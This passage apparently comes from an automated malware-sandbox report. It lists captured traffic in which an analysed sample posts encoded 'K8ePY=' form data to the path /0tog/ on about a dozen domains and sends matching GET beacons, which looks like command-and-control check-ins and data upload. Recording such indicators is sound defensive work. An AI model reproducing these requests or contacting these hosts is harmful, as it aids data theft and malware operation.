59 74 50 67 63 4c 57 61 7e 66 43 6d 4b 77 65 63 28 31 62 6f 6f 68 56 5a 66 47 6b 51 70 71 64 52 55 57 30 58 64 4c 51 39 54 36 66 57 51 55 55 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=WyNoShgjoiwUJD61kUy_9t7gbwUN76tbEkqxpM~Sh2Ggj4gfUNDIrHwdgqfLq-1bJ0h6VvPQYD8HB2oQARtXgHCJTquhq5zONBYTvPu5tOXTl5e53DXbeX0QyOUINnj9(SsLpY5VtgmJyOQupjlZe7nGI7cAaUj_(MIuADNmnGOlNadwlUn6~z(-8FgeaxruRrJoH9eoGDaUou8drksBQOKllP02K5noxreJsjoPdBhuG_oP0BiFKxM1t6~PEl5D5PSD9RuUVlQ35WnKt-1WtXeoXYkz9GyD4-ASCaD_55yvBl7ytY9G~-ZONvaPNtwtG-cmm0j7zr5v~9mO6Kji97MwNIdreQ5dfAYtPgcLWa~fCmKwec(1boohVZfGkQpqdRUW0XdLQ9T6fWQUUw).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.splishysplashie.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.splishysplashie.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.splishysplashie.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 58 55 70 30 38 52 58 57 41 73 49 51 4c 4d 65 6b 49 41 70 69 46 49 55 43 77 6d 6c 52 57 35 76 74 78 57 5a 4c 52 43 58 37 77 68 41 32 74 67 4e 49 4b 70 4e 6f 4b 43 48 6f 56 4d 55 62 56 43 32 33 28 59 71 75 73 68 37 6d 45 4e 7e 4f 41 50 48 4e 45 43 68 34 52 75 79 53 44 54 4e 54 36 78 79 33 38 54 59 74 61 5a 53 44 52 66 44 68 32 78 54 52 66 55 57 64 64 4a 66 36 5a 55 34 6e 65 70 59 69 52 69 42 79 39 59 28 39 77 6a 28 73 77 58 4d 6d 5a 2d 62 63 32 64 6c 4f 42 6a 79 36 74 44 6e 42 54 77 39 6e 78 67 48 54 37 71 57 4f 48 59 30 5f 59 6f 7e 35 6e 37 6c 72 51 6f 50 43 67 62 33 46 67 53 69 63 32 35 4c 75 44 41 74 51 34 6d 36 59 36 63 6a 47 73 73 6a 4c 71 5a 72 7a 7a 67 31 58 4a 53 61 7a 78 4f 69 55 34 37 44 4c 5a 6f 66 64 6a 79 58 38 42 41 75 6d 71 43 43 78 6e 43 68 43 68 42 67 68 5a 68 45 65 36 58 33 74 43 35 52 50 74 45 43 37 54 62 51 79 6c 7a 73 37 70 54 7e 66 55 46 38 31 77 6d 74 52 28 43 70 69 73 2d 35 77 74 41 4d 32 45 77 6b 70 6f 4c 34 2d 49 53 34 55 43 39 79 56 58 6c 31 77 79 49 6c 5a 41 43 70 50 54 35 4b 47 47 62 79 55 74 46 79 31 4c 4b 6f 78 68 69 46 51 4c 58 57 4f 4f 46 4c 6b 47 53 71 63 64 5a 70 46 48 5a 36 4a 4d 4c 7e 6a 36 69 33 66 66 5f 48 68 43 78 34 71 5a 4b 6a 58 34 41 5a 62 43 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=XUp08RXWAsIQLMekIApiFIUCwmlRW5vtxWZLRCX7whA2tgNIKpNoKCHoVMUbVC23(Yqush7mEN~OAPHNECh4RuySDTNT6xy38TYtaZSDRfDh2xTRfUWddJf6ZU4nepYiRiBy9Y(9wj(swXMmZ-bc2dlOBjy6tDnBTw9nxgHT7qWOHY0_Yo~5n7lrQoPCgb3FgSic25LuDAtQ4m6Y6cjGssjLqZrzzg1XJSazxOiU47DLZofdjyX8BAumqCCxnChChBghZhEe6X3tC5RPtEC7TbQylzs7pT~fUF81wmtR(Cpis-5wtAM2EwkpoL4-IS4UC9yVXl1wyIlZACpPT5KGGbyUtFy1LKoxhiFQLXWOOFLkGSqcdZpFHZ6JML~j6i3ff_HhCx4qZKjX4AZbCA).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.ugpounds.infoConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.ugpounds.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ugpounds.info/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 6a 78 59 68 5a 6e 34 33 31 72 6e 70 52 2d 42 49 39 56 34 44 57 35 64 51 6c 4e 4a 65 35 38 6c 34 6d 67 7e 64 33 77 4d 41 70 49 61 76 72 35 61 45 79 57 4c 30 6a 43 30 4e 49 45 56 72 6e 77 56 75 79 65 34 35 6e 6d 66 33 43 74 62 54 45 75 62 68 77 59 53 46 33 7a 52 37 6e 78 50 69 31 52 68 54 30 69 66 6c 48 45 4a 79 51 6b 46 32 38 77 4d 6c 77 53 4d 74 31 41 41 77 32 74 76 37 42 72 36 71 68 50 44 70 51 2d 45 35 38 52 32 4c 74 31 7e 7a 54 33 65 66 44 42 78 65 4f 43 63 30 72 5f 78 30 59 47 7e 51 6a 33 72 76 79 4c 48 39 55 33 66 50 6e 5f 59 6f 65 48 7a 4e 77 31 39 35 50 38 51 45 6c 65 69 6d 77 6d 49 51 6a 58 46 57 30 5a 44 44 4c 4d 6f 78 67 38 34 61 28 57 7a 39 7a 66 46 6b 67 4c 66 2d 41 64 37 56 74 43 6d 39 6a 5f 72 7a 4c 35 6f 6d 79 49 76 36 65 47 39 55 54 50 66 58 70 4d 4d 59 35 59 45 56 51 76 7a 4a 4c 39 64 50 6c 57 73 4f 28 74 6e 54 36 46 63 32 30 51 69 4f 28 5a 34 70 6a 5a 68 67 62 46 37 5a 6f 55 47 32 4a 78 52 39 56 6f 43 74 69 39 4b 53 42 6a 65 38 4d 67 4b 46 53 4d 65 78 42 37 42 67 4f 54 71 61 48 73 30 4b 4e 35 4b 43 65 4e 41 64 46 65 31 59 55 6c 6a 33 4d 73 56 31 73 6a 30 38 4a 4b 61 2d 4f 2d 31 54 65 74 38 6f 44 4b 78 49 70 2d 68 6f 51 4d 39 75 30 45 45 78 4d 4f 28 38 56 69 63 75 6a 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=jxYhZn431rnpR-BI9V4DW5dQlNJe58l4mg~d3wMApIavr5aEyWL0jC0NIEVrnwVuye45nmf3CtbTEubhwYSF3zR7nxPi1RhT0iflHEJyQkF28wMlwSMt1AAw2tv7Br6qhPDpQ-E58R2Lt1~zT3efDBxeOCc0r_x0YG~Qj3rvyLH9U3fPn_YoeHzNw195P8QEleimwmIQjXFW0ZDDLMoxg84a(Wz9zfFkgLf-Ad7VtCm9j_rzL5omyIv6eG9UTPfXpMMY5YEVQvzJL9dPlWsO(tnT6Fc20QiO(Z4pjZhgbF7ZoUG2JxR9VoCti9KSBje8MgKFSMexB7BgOTqaHs0KN5KCeNAdFe1YUlj3MsV1sj08JKa-O-1Tet8oDKxIp-hoQM9u0EExMO(8VicujA).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.kuralike.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.kuralike.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kuralike.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 71 48 4e 53 63 6a 73 38 57 66 4a 50 66 68 5a 52 76 33 66 75 61 56 52 48 44 43 39 59 58 79 46 46 28 73 4d 45 6b 66 79 70 58 44 31 61 55 47 34 58 6e 6e 56 50 65 4a 28 73 42 31 75 76 49 33 37 4b 71 49 75 54 54 2d 54 32 7e 79 49 48 34 62 39 47 54 66 4c 49 5a 69 6d 4d 44 34 41 50 43 31 4a 4b 6f 38 69 76 61 33 48 59 59 4d 61 4d 4f 57 7a 38 4d 58 6a 34 33 54 50 49 72 43 7e 72 69 69 53 63 39 71 55 77 77 68 4c 52 59 34 74 32 67 37 44 49 34 4f 48 66 52 65 35 47 43 32 64 61 76 73 63 6e 61 5f 42 7a 75 6b 30 56 6b 6a 70 37 52 62 7e 69 37 2d 6e 55 38 69 33 73 34 4d 30 32 54 4c 6c 30 43 70 30 65 59 73 71 71 56 67 4d 70 63 44 4a 66 6c 4e 7a 51 31 7a 6b 34 6b 79 37 48 38 47 33 69 34 54 70 73 36 76 4a 30 64 43 66 56 69 74 7e 65 76 68 64 7a 64 52 73 43 31 53 67 70 68 6f 30 70 44 78 4c 55 43 44 4e 4f 39 37 59 6a 71 56 6e 46 4f 66 45 45 53 70 74 49 62 5a 37 56 39 69 38 78 58 77 58 70 4d 34 31 5a 72 49 35 6a 6e 54 79 71 38 6b 7a 5a 48 74 77 46 4e 66 39 5a 49 43 78 63 4b 63 71 6e 73 46 63 71 6a 41 57 2d 33 73 53 6c 72 4e 65 49 6f 35 54 58 70 55 37 57 79 70 28 35 4c 61 28 42 43 55 53 70 64 6d 6e 44 51 72 70 5f 7a 69 69 5a 44 73 64 75 46 39 6a 61 76 43 36 70 78 59 44 44 77 30 59 7a 5a 63 54 49 28 78 46 31 4e 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=qHNScjs8WfJPfhZRv3fuaVRHDC9YXyFF(sMEkfypXD1aUG4XnnVPeJ(sB1uvI37KqIuTT-T2~yIH4b9GTfLIZimMD4APC1JKo8iva3HYYMaMOWz8MXj43TPIrC~riiSc9qUwwhLRY4t2g7DI4OHfRe5GC2davscna_Bzuk0Vkjp7Rb~i7-nU8i3s4M02TLl0Cp0eYsqqVgMpcDJflNzQ1zk4ky7H8G3i4Tps6vJ0dCfVit~evhdzdRsC1Sgpho0pDxLUCDNO97YjqVnFOfEESptIbZ7V9i8xXwXpM41ZrI5jnTyq8kzZHtwFNf9ZICxcKcqnsFcqjAW-3sSlrNeIo5TXpU7Wyp(5La(BCUSpdmnDQrp_ziiZDsduF9javC6pxYDDw0YzZcTI(xF1Nw).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cdershoushichang.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cdershoushichang.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cdershoushichang.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 37 7a 75 38 35 2d 54 49 63 49 32 61 63 49 47 32 37 33 37 31 55 74 44 46 63 46 36 79 76 65 5a 5a 61 36 4f 5f 42 61 46 4b 43 30 4c 31 34 45 4e 4e 6d 55 50 72 6e 72 28 62 42 52 7a 71 52 50 38 49 7e 34 63 66 66 6e 54 33 52 55 65 71 69 4c 42 6d 58 46 39 55 44 41 50 4d 36 68 51 63 33 76 39 43 6f 6e 51 31 5a 66 4d 49 6b 6d 6a 64 36 77 30 42 56 58 78 79 4f 38 4b 5f 65 71 4d 55 28 42 44 73 67 78 75 6e 5a 33 36 55 50 37 69 39 76 45 70 66 46 76 6c 6d 6a 54 7a 48 6b 7a 70 46 39 6b 45 77 57 43 48 36 48 58 62 66 69 31 32 78 76 49 59 74 38 4a 78 52 44 54 75 37 54 78 69 45 48 55 6e 58 34 4d 32 43 79 4a 50 62 7e 72 62 37 39 30 39 35 74 4a 52 7a 34 31 64 46 4f 62 28 71 42 71 75 66 32 6d 53 49 34 51 79 72 79 65 31 47 28 35 33 6a 65 68 49 7a 35 63 47 44 36 37 6c 67 38 37 38 62 64 6a 55 4d 42 5f 35 36 69 74 66 35 37 35 47 66 67 64 57 69 6f 5f 7e 48 69 31 67 35 59 34 78 58 67 62 72 4f 54 35 33 6d 71 36 77 46 56 79 54 58 70 31 30 39 42 41 4c 7a 43 44 65 55 57 49 79 38 54 36 48 53 41 2d 48 4a 74 79 6a 79 35 45 51 6f 62 46 4c 67 31 4b 56 6e 78 41 63 72 32 51 39 51 4a 49 47 6c 76 57 78 4d 72 54 73 73 35 71 56 37 69 65 57 4b 34 4b 73 35 6d 78 4e 57 70 30 78 65 35 6c 77 41 56 58 74 6d 4c 73 6e 4d 48 6b 6a 5f 71 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=7zu85-TIcI2acIG27371UtDFcF6yveZZa6O_BaFKC0L14ENNmUPrnr(bBRzqRP8I~4cffnT3RUeqiLBmXF9UDAPM6hQc3v9ConQ1ZfMIkmjd6w0BVXxyO8K_eqMU(BDsgxunZ36UP7i9vEpfFvlmjTzHkzpF9kEwWCH6HXbfi12xvIYt8JxRDTu7TxiEHUnX4M2CyJPb~rb79095tJRz41dFOb(qBquf2mSI4Qyrye1G(53jehIz5cGD67lg878bdjUMB_56itf575GfgdWio_~Hi1g5Y4xXgbrOT53mq6wFVyTXp109BALzCDeUWIy8T6HSA-HJtyjy5EQobFLg1KVnxAcr2Q9QJIGlvWxMrTss5qV7ieWK4Ks5mxNWp0xe5lwAVXtmLsnMHkj_qw).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cakoi.xyzConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cakoi.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cakoi.xyz/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 4a 48 4a 55 79 77 32 39 35 36 6c 5a 70 67 4a 54 71 5a 6b 4f 54 5f 70 43 73 62 4f 75 7e 76 61 30 71 64 42 62 28 7a 55 44 47 36 6d 65 69 57 31 5f 38 5a 41 78 39 74 64 62 4e 34 6e 6b 6d 68 6d 4a 44 4b 58 37 66 50 37 78 70 68 52 69 41 57 52 36 65 56 74 32 33 37 42 67 69 34 76 66 54 37 7a 47 4c 74 6f 74 73 4e 54 52 7e 6d 4f 55 4e 63 73 4f 68 4c 78 53 35 59 36 70 28 74 4d 53 33 63 66 2d 4a 52 44 59 58 68 68 74 71 4a 54 48 4a 6d 48 6e 6b 6d 6a 4f 37 41 7e 69 75 64 71 79 67 6a 28 78 47 6d 7e 30 46 46 41 61 71 48 51 4b 74 4b 38 36 61 4d 55 75 62 33 56 37 44 44 64 62 43 61 44 55 79 41 63 6c 38 2d 58 6d 36 7a 53 46 68 79 62 44 50 41 48 6b 41 52 45 6a 78 59 4d 4d 55 61 61 32 6d 49 5a 67 4b 79 4e 78 65 6c 36 43 6f 66 42 31 4d 48 57 63 70 5a 30 4c 50 51 75 4d 39 51 52 78 43 57 32 52 50 75 43 62 33 62 7a 66 56 56 62 64 54 39 6b 32 7a 73 6a 59 54 7a 39 43 5a 41 46 62 41 6f 53 41 71 6a 5a 59 6c 66 52 50 45 6d 75 76 4f 4e 44 34 6d 7a 37 71 68 5f 4c 43 33 62 66 6a 7a 6b 75 50 59 74 6f 34 73 52 53 7a 79 5a 4c 42 63 32 49 33 77 36 57 2d 57 5f 4b 5f 6e 78 53 36 6a 30 6a 70 4a 44 4e 44 54 74 4d 39 57 34 42 7a 6d 6a 72 43 57 77 43 37 69 47 59 49 77 5a 49 34 54 42 50 5f 72 51 50 69 72 31 44 5a 64 75 6e 73 79 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=JHJUyw2956lZpgJTqZkOT_pCsbOu~va0qdBb(zUDG6meiW1_8ZAx9tdbN4nkmhmJDKX7fP7xphRiAWR6eVt237Bgi4vfT7zGLtotsNTR~mOUNcsOhLxS5Y6p(tMS3cf-JRDYXhhtqJTHJmHnkmjO7A~iudqygj(xGm~0FFAaqHQKtK86aMUub3V7DDdbCaDUyAcl8-Xm6zSFhybDPAHkAREjxYMMUaa2mIZgKyNxel6CofB1MHWcpZ0LPQuM9QRxCW2RPuCb3bzfVVbdT9k2zsjYTz9CZAFbAoSAqjZYlfRPEmuvOND4mz7qh_LC3bfjzkuPYto4sRSzyZLBc2I3w6W-W_K_nxS6j0jpJDNDTtM9W4BzmjrCWwC7iGYIwZI4TBP_rQPir1DZdunsyQ).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.davabeauty.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.davabeauty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.davabeauty.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 6f 64 6a 79 4d 6d 76 72 6f 6c 48 71 30 71 53 54 4a 63 75 37 58 39 62 38 6d 45 6c 72 72 73 58 48 48 44 69 35 76 50 61 33 33 38 6d 61 5a 4f 79 68 58 38 32 4f 6e 51 6e 5a 62 66 4b 71 59 38 4e 76 57 38 69 61 41 7a 79 70 33 5a 4f 44 76 57 47 47 66 5a 62 33 7e 58 47 41 52 64 69 59 56 76 39 36 58 4f 42 31 69 68 67 67 65 38 68 6a 35 4c 37 4d 32 6d 43 49 32 74 45 51 64 4b 4f 70 6e 7a 4f 34 69 44 79 49 4a 52 64 52 47 51 4a 5a 7a 6d 68 72 65 33 50 4a 46 53 46 41 6f 35 58 65 6d 50 62 4b 6a 32 36 5f 69 73 50 4c 6a 6a 63 6c 78 7a 6c 36 52 37 77 4f 4e 6a 79 31 47 78 50 67 76 62 69 77 44 50 61 47 41 4b 34 43 61 5f 47 55 37 75 42 41 41 36 7e 6e 41 76 69 48 6e 47 33 49 6b 33 4d 71 7a 77 62 6b 77 44 6d 39 37 54 33 39 34 50 28 47 48 70 52 42 78 70 56 71 71 73 73 34 55 4c 57 32 42 57 64 52 44 62 53 2d 76 7a 33 6d 63 6d 56 46 38 61 61 67 78 31 58 69 4a 54 42 5a 72 78 31 6e 75 7a 6b 5f 64 68 4f 4e 35 6b 6b 2d 51 46 57 76 73 2d 36 43 59 45 6b 58 71 47 54 66 64 4a 42 6e 67 63 70 6a 37 46 4e 5f 67 70 4e 67 5a 6b 61 49 4d 70 37 56 34 5a 72 48 30 4b 41 64 78 63 51 2d 42 58 41 77 6d 5a 51 6e 59 6e 75 35 5a 55 49 75 28 42 32 59 33 74 48 65 52 72 66 77 58 32 4b 61 32 31 28 76 6d 33 72 51 66 70 30 6d 72 34 61 6c 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=odjyMmvrolHq0qSTJcu7X9b8mElrrsXHHDi5vPa338maZOyhX82OnQnZbfKqY8NvW8iaAzyp3ZODvWGGfZb3~XGARdiYVv96XOB1ihgge8hj5L7M2mCI2tEQdKOpnzO4iDyIJRdRGQJZzmhre3PJFSFAo5XemPbKj26_isPLjjclxzl6R7wONjy1GxPgvbiwDPaGAK4Ca_GU7uBAA6~nAviHnG3Ik3MqzwbkwDm97T394P(GHpRBxpVqqss4ULW2BWdRDbS-vz3mcmVF8aagx1XiJTBZrx1nuzk_dhON5kk-QFWvs-6CYEkXqGTfdJBngcpj7FN_gpNgZkaIMp7V4ZrH0KAdxcQ-BXAwmZQnYnu5ZUIu(B2Y3tHeRrfwX2Ka21(vm3rQfp0mr4alDQ).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.icfc-lr.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.icfc-lr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.icfc-lr.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 74 77 7e 38 57 64 4b 48 5a 4c 38 45 73 31 6e 34 6a 74 6a 4a 38 35 4c 35 70 72 37 63 7e 50 38 59 7a 35 65 54 72 41 70 72 62 59 6c 48 68 61 50 39 4c 56 42 51 30 4b 78 75 74 59 79 54 4d 2d 42 35 4c 7a 63 75 68 34 62 31 69 31 45 64 4d 6f 70 6e 69 2d 68 59 65 36 57 76 6d 72 5a 70 71 38 45 56 42 42 53 6f 6f 41 51 64 7e 53 6a 43 4d 47 63 52 57 50 52 53 6f 48 63 49 4d 2d 39 76 54 31 41 58 4e 45 43 7a 47 5f 33 4f 6d 36 4b 5f 45 36 74 6e 42 66 31 6e 67 76 61 75 69 63 6d 46 7a 72 72 65 41 70 78 31 69 74 6a 63 78 44 31 74 7e 6f 58 66 65 61 6d 4b 6f 5f 4c 4b 64 55 45 5a 6d 43 73 6f 79 57 45 34 66 4e 46 5f 63 68 28 35 59 44 48 61 50 58 4c 75 32 7a 68 38 76 37 63 34 59 2d 61 64 45 58 4b 6f 57 67 45 56 4d 33 4f 4c 6b 69 67 42 79 4d 5a 52 53 52 6f 74 6b 42 34 55 6d 41 43 64 51 2d 55 61 73 77 69 34 7a 62 36 6d 77 44 46 38 6e 54 6b 70 77 37 71 43 56 79 48 51 39 63 52 30 28 50 41 31 6e 79 6b 76 64 53 6a 5f 41 45 69 79 79 74 52 64 4b 59 41 65 44 46 48 4b 54 66 51 6d 4d 53 42 5f 62 55 72 76 76 50 43 33 79 35 46 74 41 6d 57 76 36 5f 54 78 37 7a 65 70 76 6c 68 61 61 30 4a 4e 6f 30 36 2d 79 62 31 68 50 48 75 43 48 49 79 56 73 77 65 62 32 5a 4d 48 79 77 78 73 67 64 34 63 33 6a 37 31 41 61 62 5a 45 49 5a 54 75 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=tw~8WdKHZL8Es1n4jtjJ85L5pr7c~P8Yz5eTrAprbYlHhaP9LVBQ0KxutYyTM-B5Lzcuh4b1i1EdMopni-hYe6WvmrZpq8EVBBSooAQd~SjCMGcRWPRSoHcIM-9vT1AXNECzG_3Om6K_E6tnBf1ngvauicmFzrreApx1itjcxD1t~oXfeamKo_LKdUEZmCsoyWE4fNF_ch(5YDHaPXLu2zh8v7c4Y-adEXKoWgEVM3OLkigByMZRSRotkB4UmACdQ-Uaswi4zb6mwDF8nTkpw7qCVyHQ9cR0(PA1nykvdSj_AEiyytRdKYAeDFHKTfQmMSB_bUrvvPC3y5FtAmWv6_Tx7zepvlhaa0JNo06-yb1hPHuCHIyVsweb2ZMHywxsgd4c3j71AabZEIZTuA).
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=WAnq49OZtUlVoL/HnvBIdWMBLlOF4zZrZ69KoLBF6QuqfC3NtN9xH0oAOI3RR7LT9klu&uTrL=ArghXbG HTTP/1.1Host: www.smileyefero.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=ZtwHo4rcg6kY+oKBKGmDUJHc3TV2USuBeLhI4qVraQDetVBqj1irZ6xIt6IyyZwRRl8c&uTrL=ArghXbG HTTP/1.1Host: www.cxyl968.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=PusX7byL57M2YYa4nNlIjQSbI2y9oy+NyluH5iYGJdPErjOrRpjLqtGKatonovN7h70m&uTrL=ArghXbG HTTP/1.1Host: www.bestselfietools.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=0HRdnbOcFNnxvyqGcVRvrrLsbqQ9r15luAj7Zds+T+sucbkdrSSKiOrsMjTBx8eXU9lb&uTrL=ArghXbG HTTP/1.1Host: www.homecaredispatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=Zw5SMG8LqDk2YgvF1TbiqrHOLlMCwY9PXyT/3tCGwzSgj8pOa/e/s2Jc6JGsv8dePUVF&uTrL=ArghXbG HTTP/1.1Host: www.netrworksoultions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=YWdOi2HWMsssXNHLXFcnHd0z835yY7ryqR01DxX99DAAjRhjb58wIVulD8h5ehWU5+2Z&uTrL=ArghXbG HTTP/1.1Host: www.splishysplashie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=szsbHHEa8Z34Dvcr8ggFBf0+sO9O8s5D9HLjjzg3ltezu5OazjebzGlObkZU0CN2gu4p&uTrL=ArghXbG HTTP/1.1Host: www.ugpounds.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=lF5oCHYtU8NdNx0d23GGFix6DipSWwZzlMB9xev3ejNmYk0/3E8qaZy8VFiZaknF39Wz&uTrL=ArghXbG HTTP/1.1Host: www.kuralike.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=0xaGnbbnQYzuNYvkhy/sTqjZMVShuqNfLb/uaoFgDn+28nRXiEn9ntqddgr1RONYrtxd&uTrL=ArghXbG HTTP/1.1Host: www.cdershoushichang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=GF9usWOs6Zom8CUcoM9HTLdEnbH/87GB74cAi0EjR4aCsk9v8LlL6JBcR57llzuoSfvQ&uTrL=ArghXbG HTTP/1.1Host: www.cakoi.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=nfXISCjkjF7o09PEfrvvWtjdlx5A9d/AXTzo14C36Z6FZ6yyZM+c1gbaB/GDS9tLL8uG&uTrL=ArghXbG HTTP/1.1Host: www.davabeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=iyKGI9upEL4Yziuw+rqQi4DZsZrOo+I4mtWVwzFVTdhPpZPYbFAk464txuKcB7xLLFg9&uTrL=ArghXbG HTTP/1.1Host: www.icfc-lr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.smileyefero.com
          Source: unknownHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cxyl968.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cxyl968.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cxyl968.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 57 76 45 39 32 66 32 71 67 71 39 72 68 4c 6e 65 64 6e 62 65 4b 4e 4b 39 31 57 39 77 61 43 71 77 41 65 30 47 6a 6f 78 44 61 53 54 38 72 30 78 36 73 77 6e 67 52 2d 30 4d 31 4c 30 41 39 71 6b 57 44 44 77 56 55 72 62 79 47 6c 7a 48 72 4a 41 49 47 66 76 31 79 4b 5a 46 6e 74 39 32 72 6e 52 6c 77 30 28 56 4a 5f 36 6d 76 5f 6c 70 48 71 39 32 79 61 68 6b 66 6b 54 47 4f 57 5a 77 49 4d 69 50 38 51 4c 41 6e 57 52 66 6c 64 72 66 6c 38 31 6f 76 76 52 6f 69 76 64 6c 45 45 53 43 28 49 4c 4b 75 39 64 4f 6f 70 48 49 6b 47 38 79 58 32 48 36 35 5f 34 32 4f 73 76 74 67 78 52 31 62 6d 51 51 48 47 67 49 7e 58 47 30 45 57 44 41 73 55 28 66 46 6a 30 68 72 6a 62 56 39 79 4f 4c 4a 42 67 46 33 66 62 68 75 74 66 5a 61 42 6f 47 32 73 7a 45 42 68 59 4f 67 51 7a 6d 69 34 63 41 76 53 4b 63 50 30 6f 5a 74 56 5a 6f 46 6e 33 75 32 50 70 53 73 68 49 66 53 56 46 37 68 6d 76 6b 49 79 4b 41 79 68 34 4b 69 7a 43 69 39 77 42 43 4a 4a 32 5a 77 63 54 42 69 57 64 37 36 71 53 72 71 4e 50 49 58 71 4a 67 4a 49 34 4f 42 44 45 47 5a 34 65 4a 44 50 77 57 4f 55 74 69 4c 77 48 5a 4d 53 71 48 72 6d 63 43 55 49 4b 65 70 49 4d 63 7e 63 6f 56 56 4f 55 72 67 37 68 6a 4d 55 39 53 47 53 54 36 57 67 78 73 38 4f 32 73 36 61 47 45 49 5a 49 66 6e 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=WvE92f2qgq9rhLnednbeKNK91W9waCqwAe0GjoxDaST8r0x6swngR-0M1L0A9qkWDDwVUrbyGlzHrJAIGfv1yKZFnt92rnRlw0(VJ_6mv_lpHq92yahkfkTGOWZwIMiP8QLAnWRfldrfl81ovvRoivdlEESC(ILKu9dOopHIkG8yX2H65_42OsvtgxR1bmQQHGgI~XG0EWDAsU(fFj0hrjbV9yOLJBgF3fbhutfZaBoG2szEBhYOgQzmi4cAvSKcP0oZtVZoFn3u2PpSshIfSVF7hmvkIyKAyh4KizCi9wBCJJ2ZwcTBiWd76qSrqNPIXqJgJI4OBDEGZ4eJDPwWOUtiLwHZMSqHrmcCUIKepIMc~coVVOUrg7hjMU9SGST6Wgxs8O2s6aGEIZIfnA).
